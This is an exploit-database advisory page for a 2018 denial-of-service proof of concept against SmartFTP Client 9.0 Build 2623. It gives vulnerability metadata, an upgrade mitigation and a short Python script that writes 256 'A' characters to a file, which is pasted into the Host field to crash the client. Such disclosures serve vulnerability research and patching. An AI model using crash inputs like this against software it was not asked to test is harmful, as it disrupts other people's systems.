header-logo
Suggest Exploit
vendor:
SmartFTP Client
by:
Alejandra Sánchez
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: SmartFTP Client
Affected Version From: 9.0.2623.0
Affected Version To: 9.0.2623.0
Patch Exists: YES
Related CWE: N/A
CPE: a:smartftp:smartftp_client
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2016 (x64)/ Windows 10 Single Language x64
2018

SmartFTP 9.0 Build 2623 – Denial of Service (PoC)

SmartFTP 9.0 Build 2623 is vulnerable to a denial of service attack. By sending a specially crafted payload of 256 A characters, an attacker can cause the application to crash. This can be done by running a python script to generate a text file containing the payload, then copying the contents of the text file and pasting it into the Host field of the SmartFTP Client application.

Mitigation:

Upgrade to the latest version of SmartFTP Client.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service (PoC)
# Date: 06/12/2018
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/get/SFTPMSI64.exe
# Version: 9.0.2623.0
# Tested on: Windows Server 2016 (x64)/ Windows 10 Single Language x64

# Steps to Produce the Crash: 
# 1.- Run python code : python SmartFTPClient.py
# 2.- Open SmartFTPClient.txt and copy content to clipboard
# 3.- Open SmartFTP Client 
# 4.- New connection
# 5.- Paste ClipBoard on Host 
# 6.- Crashed


buffer = "\x41" * 256
f = open ("SmartFTPClient.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR